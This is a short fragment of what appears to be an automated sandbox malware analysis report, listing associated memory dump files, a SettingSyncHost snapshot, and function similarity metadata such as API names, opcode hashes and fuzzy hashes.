                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                                                                                                      • String ID: F/9
                                                                                                                                      • API String ID: 3996875869-3327105029
                                                                                                                                      • Opcode ID: e6ceb32f6c557aa241a9605725e8f105d3c059ef4ca868c0f312d48116b1aa19
                                                                                                                                      • Instruction ID: 12524028ddf1e16d1143847d6e1eaecc8c8a84f7ec1df8951f04bd0494862efd
                                                                                                                                      • Opcode Fuzzy Hash: e6ceb32f6c557aa241a9605725e8f105d3c059ef4ca868c0f312d48116b1aa19
                                                                                                                                      • Instruction Fuzzy Hash: 4AD01772500208ABEF409B99E88AE9D3BDCEB84238B558441F44DCB652DB35E8908A18
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%